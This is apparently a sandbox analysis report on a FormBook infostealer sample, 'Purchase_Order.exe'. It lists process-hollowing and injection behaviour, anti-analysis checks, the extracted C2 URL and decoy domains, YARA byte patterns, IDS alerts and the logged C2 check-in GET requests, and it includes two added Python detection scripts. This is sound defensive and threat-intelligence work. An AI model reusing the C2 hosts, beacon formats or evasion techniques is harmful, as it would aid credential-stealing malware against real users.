Analysis Report Purchase_Order.exe

Overview

General Information

Sample Name: Purchase_Order.exe
Analysis ID: 433266
MD5: 4aa8159742becd97f9ecdda33798b065
SHA1: 775aee28c33102de8c4bdd45dd09821b717b8678
SHA256: 65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Process Start Without DLL
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase_Order.exe (PID: 1528 cmdline: 'C:\Users\user\Desktop\Purchase_Order.exe' MD5: 4AA8159742BECD97F9ECDDA33798B065)
    • RegSvcs.exe (PID: 3608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • systray.exe (PID: 1752 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 1200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
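The tree above draws explorer.exe beneath RegSvcs.exe with an empty command line: that node is the already-running shell that RegSvcs.exe injected into (the thread-context, APC and foreign-memory signatures listed earlier), not a process it created, so endpoint telemetry shows explorer.exe with its normal parent. The chain that is visible in process-creation logs is therefore Purchase_Order.exe creating an argument-less RegSvcs.exe, and later systray.exe spawning cmd.exe to delete the RegSvcs.exe binary. As an added example that is not part of this report, the Python below runs two checks over process-creation events modelled on that chain. The events are constructed inline (explorer.exe's parent PID 800 and the "cmd.exe" prefix on the cmd.exe command line are assumptions), and the set of watched .NET hosts is an assumption as well.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events modelled on the report's tree (not a sandbox
# export). explorer.exe keeps a parent outside this list (800, an assumed
# userinit/winlogon PID) because RegSvcs.exe injected into it rather than creating it.
EVENTS = [
    ProcEvent(1528, 1000, "C:\\Users\\user\\Desktop\\Purchase_Order.exe",
              "'C:\\Users\\user\\Desktop\\Purchase_Order.exe'"),
    ProcEvent(3608, 1528, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe",
              "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"),
    ProcEvent(3292, 800, "C:\\Windows\\explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(1752, 3292, "C:\\Windows\\SysWOW64\\systray.exe",
              "C:\\Windows\\SysWOW64\\systray.exe"),
    ProcEvent(1200, 1752, "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe /c del 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe'"),
    ProcEvent(5552, 1200, "C:\\Windows\\system32\\conhost.exe",
              "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
]

# Assumption: .NET framework hosts that do nothing useful when started without arguments.
NET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}
WINDIR = "c:\\windows\\"


def _name(path):
    return ntpath.basename(path).lower()


def _in_windir(path):
    return path.lower().startswith(WINDIR)


def _has_args(ev):
    # True when the command line carries anything beyond the (possibly quoted) image path.
    rest = ev.cmdline.strip().strip("'\"").lower()
    return rest != ev.image.lower()


def lineage(events, pid):
    """Image names from the oldest known ancestor down to pid, via real parent PIDs."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def detect(events):
    """Return (rule, pid, parent_pid) triples for the two relationships the report shows."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue
        name = _name(ev.image)
        # Rule 1: hollowing host. A .NET utility started with an empty argument list
        # by a parent that is not itself a Windows binary.
        if name in NET_HOSTS and not _has_args(ev) and not _in_windir(parent.image):
            hits.append(("dotnet_host_no_args", ev.pid, parent.pid))
        # Rule 2: self-cleanup. A Windows binary spawns cmd.exe "/c del" against a
        # path under C:\Windows (here systray.exe deleting RegSvcs.exe).
        cl = ev.cmdline.lower()
        if (name == "cmd.exe" and _in_windir(parent.image)
                and "/c" in cl and " del " in cl and WINDIR in cl):
            hits.append(("shell_deletes_windows_binary", ev.pid, parent.pid))
    return hits


if __name__ == "__main__":
    for rule, pid, ppid in detect(EVENTS):
        print(rule, pid, "<-", ppid, " / ".join(lineage(EVENTS, pid)))
```

Rule 1 keys on the empty argument list rather than on the RegSvcs.exe name alone, because RegSvcs.exe is a legitimate, signed Microsoft binary and the Sigma "Possible Applocker Bypass" hit above fires on exactly that legitimacy being abused; rule 2 ignores the conhost.exe child, which every console process gets.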

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.culturalinterface.net/uqf5/"], "decoy": ["paolograssino.com", "hammockcoastproperty.net", "blinbins.com", "financierapoorvenirsas.com", "mattruddle.com", "wighumanhair.com", "tvdajiang14.com", "theblackharvest.com", "tylerrucarean.com", "a-prime-india-demataccount.zone", "amboselisafarigallery.info", "toolbnbapp.com", "scientificindustrial.com", "trainup-wall.com", "pocosmo.com", "thebluepottingtable.com", "leavelogs.com", "verbalfreedom.com", "qa4i.com", "kiiikoo.com", "glossedbythebrat.com", "gorditasdemaiz.com", "healthystartswithin.com", "homeanddesignstudio.com", "skalewide.com", "bestdispatchtowitnesstoday.info", "cineconhisense.com", "mahibhardwaj.com", "imperatrizacam.com", "bezoekburen.com", "qbakan.com", "ansalapishagunrealestate.com", "crow94723.com", "kosova.one", "chhhju.com", "cominghomestead.com", "ingenious.care", "unclesamsoftware.com", "xn--cfe12fhb.com", "tradinglantern.com", "wwwthedrudgereport.com", "researchinnovations.net", "to-cs.com", "sandia.info", "tachibana-fukushima.com", "pzzfw.com", "flockuplabs.com", "stays.travel", "itertempora.net", "murrietayoga.com", "plus5tocrafting.com", "ovidrelprefilledsyringe.com", "prltoday.com", "l24consultants.net", "mexicobeachselfstorage.com", "bnvjufj.icu", "schulze.media", "thewinebarrel.info", "blesst.tech", "newtec.life", "acmarketinghacks.com", "elitevillaholidays.com", "pr-daily.com", "cgjanvier.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0xb44d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xb486a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xdb8f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xdbc8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc057d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xe799d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xc0069:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xe7489:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xc067f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xe7a9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xc07f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xe7c17:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xb5282:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xdc6a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xbf2e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xe6704:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb5ffa:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xdd41a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xc566f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xeca8f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xc6712:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0xc25a1:$sqlite3step: 68 34 1C 7B E1
      • 0xc26b4:$sqlite3step: 68 34 1C 7B E1
      • 0xe99c1:$sqlite3step: 68 34 1C 7B E1
      • 0xe9ad4:$sqlite3step: 68 34 1C 7B E1
      • 0xc25d0:$sqlite3text: 68 38 2A 90 C5
      • 0xc26f5:$sqlite3text: 68 38 2A 90 C5
      • 0xe99f0:$sqlite3text: 68 38 2A 90 C5
      • 0xe9b15:$sqlite3text: 68 38 2A 90 C5
      • 0xc25e3:$sqlite3blob: 68 53 D8 7F 8C
      • 0xc270b:$sqlite3blob: 68 53 D8 7F 8C
      • 0xe9a03:$sqlite3blob: 68 53 D8 7F 8C
      • 0xe9b2b:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(21 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.RegSvcs.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
4.0.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.0.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 further unpacked-PE entries not shown)
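Both rule sets above match on short, exact opcode sequences, and every JPCERT string is a five-byte `push imm32` (opcode 68 followed by a little-endian 32-bit immediate), which is consistent with the rule names (sqlite3step, sqlite3text, sqlite3blob) being hashed API names pushed before a resolver call; the hash function itself is not shown on this page and is not assumed here. As an added example, not part of the report or of either rule set, the Python below scans a buffer for those exact byte strings, reports their offsets, and decodes the pushed immediates, so a dump or the `.unpack` file can be re-checked without YARA installed. The buffer it runs on is constructed inline from the sequences listed above.

```python
import struct

# Byte strings copied from the rule matches listed above (a representative subset
# of the yara-signator sequences, and all three JPCERT strings).
SIGNATOR = {
    "sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    "sequence_1": bytes.fromhex("3C 24 0F 84 76 FF FF FF 3C 25 74 94"),
    "sequence_5": bytes.fromhex("0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06"),
    "sequence_9": bytes.fromhex("56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00"),
}
JPCERT = {
    "sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}


def find_all(buf, needle):
    """All offsets of needle in buf, overlapping matches included."""
    offs, i = [], buf.find(needle)
    while i != -1:
        offs.append(i)
        i = buf.find(needle, i + 1)
    return offs


def scan(buf, rules):
    """{name: [offsets]} for every rule string that occurs at least once."""
    hits = {}
    for name, needle in rules.items():
        offs = find_all(buf, needle)
        if offs:
            hits[name] = offs
    return hits


def push_imm32(buf, off):
    """Decode the immediate of a `push imm32` (opcode 0x68) at off, or None."""
    if off + 5 > len(buf) or buf[off] != 0x68:
        return None
    return struct.unpack_from("<I", buf, off + 1)[0]


def api_hashes(buf):
    """Rule name -> set of pushed immediates, for the JPCERT strings found in buf."""
    return {name: {push_imm32(buf, o) for o in offs}
            for name, offs in scan(buf, JPCERT).items()}


def build_sample():
    """Constructed test buffer: NOP filler with rule strings planted at known offsets."""
    buf = bytearray(b"\x90" * 0x200)
    plant = [(0x10, SIGNATOR["sequence_0"]), (0x40, SIGNATOR["sequence_0"]),
             (0x80, JPCERT["sqlite3step"]), (0xA0, JPCERT["sqlite3text"]),
             (0xC0, JPCERT["sqlite3blob"]), (0x100, SIGNATOR["sequence_9"])]
    for off, seq in plant:
        buf[off:off + len(seq)] = seq
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for name, offs in scan(sample, {**SIGNATOR, **JPCERT}).items():
        print(name, [hex(o) for o in offs])
    for name, imms in api_hashes(sample).items():
        print(name, [hex(v) for v in imms])
```

Running `scan(open("4.2.RegSvcs.exe.400000.0.unpack", "rb").read(), JPCERT)` should reproduce the offsets listed above (0x158b9, 0x159cc, and so on); the memory-dump offsets are larger because the dump starts at the region base, not at the PE header. The decoded immediates (0xE17B1C34, 0xC5902A38, 0x8C7FD853) are the values to pivot on when the same hashing shows up in a sample that the opcode sequences no longer match.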

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Start Without DLL
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase_Order.exe' , ParentImage: C:\Users\user\Desktop\Purchase_Order.exe, ParentProcessId: 1528, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3608
Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\Purchase_Order.exe' , ParentImage: C:\Users\user\Desktop\Purchase_Order.exe, ParentProcessId: 1528, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 3608

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (full configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Purchase_Order.exe | Virustotal: Detection: 20%
Source: Purchase_Order.exe | ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.259944230.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320741403.0000000001210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.504805498.0000000004D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.501363256.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.505034491.0000000004DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.321348253.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.257791048.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.320281190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 4.2.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Purchase_Order.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Purchase_Order.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: systray.pdb | source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: Binary string: systray.pdbGCTL | source: RegSvcs.exe, 00000004.00000002.320790980.0000000001240000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, | source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\LQmcYtPAJD\src\obj\Debug\AsAnyMarshaler.pdb | source: Purchase_Order.exe
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 00000004.00000002.321048424.000000000136F000.00000040.00000001.sdmp, systray.exe, 00000010.00000002.505423938.0000000004F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, systray.exe
Source: Binary string: RegSvcs.pdb | source: systray.exe, 00000010.00000002.507122760.0000000005477000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000007.00000000.291292827.000000000E140000.00000002.00000001.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop esi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 162.241.253.69:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49736 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 156.241.53.127:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49752 -> 45.140.167.161:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49755 -> 35.246.6.109:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.culturalinterface.net/uqf5/
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580T900Haqnq5nepxFw==&x2J86x=b0DT HTTP/1.1 | Host: www.prltoday.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=RIGbPleGLKfxQTAe4w4l83Ie2Cv1rNcMEGxhR3mrD7G7p1l+kx0Gi9Gk7nXoQ0ETWUCd/ihSFA==&x2J86x=b0DT HTTP/1.1 | Host: www.gorditasdemaiz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=Da4K3sj86vB0DiXWDS0M3B9qaJwAtTAx24xw0Tll3v3x/H7Mq6Ed11VjNseOa8Aw4v8GgidMYQ==&x2J86x=b0DT HTTP/1.1 | Host: www.mexicobeachselfstorage.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=OWFfPnC7AN8R77spBBTPEjKTeS6t/Yq1T4r8C76EKqDZAgRBJ/M7pX2IcLDFGki/UVfODSOMWA==&x2J86x=b0DT HTTP/1.1 | Host: www.tylerrucarean.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=G6aWL4dGCeTaDQvTN0iTmiC4rQ5Mm02kgONc9W0Ihpzmf26Z6y5bJWrOsZ7s6rQ8mSLn4IOSJg==&x2J86x=b0DT HTTP/1.1 | Host: www.cgjanvier.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/Aoh82zgIKZtO8rNXLQ==&x2J86x=b0DT HTTP/1.1 | Host: www.flockuplabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=0mO7J7bxUTMGF+cl/VKrKxzRBdjnePXE0BEJzt+odUfuolHzSnSh7sdQNpsCsCcZdtFb7j3ZKA==&x2J86x=b0DT HTTP/1.1 | Host: www.culturalinterface.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=pmtBAvifUG/ctnoihxxVo+fAjsCiy+wOZZJ542i91rLFt0/MLgCG4nudrW9V9JXQ/3W4T2ttkA==&x2J86x=b0DT HTTP/1.1 | Host: www.toolbnbapp.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=kfF6JYR62xx/HO09iSVcnhFTUCCMKaRIkXBWym1Qtkj7XLCdUz5OHH2iCIaFDs/mVibljY8vwA==&x2J86x=b0DT HTTP/1.1 | Host: www.trainup-wall.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=bDjqt1XeIDnHqlCDx4UVtMOGyZAgv2iIcL7KLwBfVGeKSjMBDNU7E4Z2+8mD2QoqovVkCTqMJw==&x2J86x=b0DT HTTP/1.1 | Host: www.paolograssino.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: global traffic | HTTP traffic detected: GET /uqf5/?7nBTylox=RQXRa0j10XdpS+WphiMG79Lf9dki4UzLVajXOJjWNMbn24QJDQJAUPqvADWkiraA7rP5UEZeUQ==&x2J86x=b0DT HTTP/1.1 | Host: www.a-prime-india-demataccount.zone | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (non-printable)
Source: Joe Sandbox View | IP Address: 213.186.33.5
Source: Joe Sandbox View | ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View | ASN Name: OVHFR
Source: unknown | DNS traffic detected: queries for: www.prltoday.com
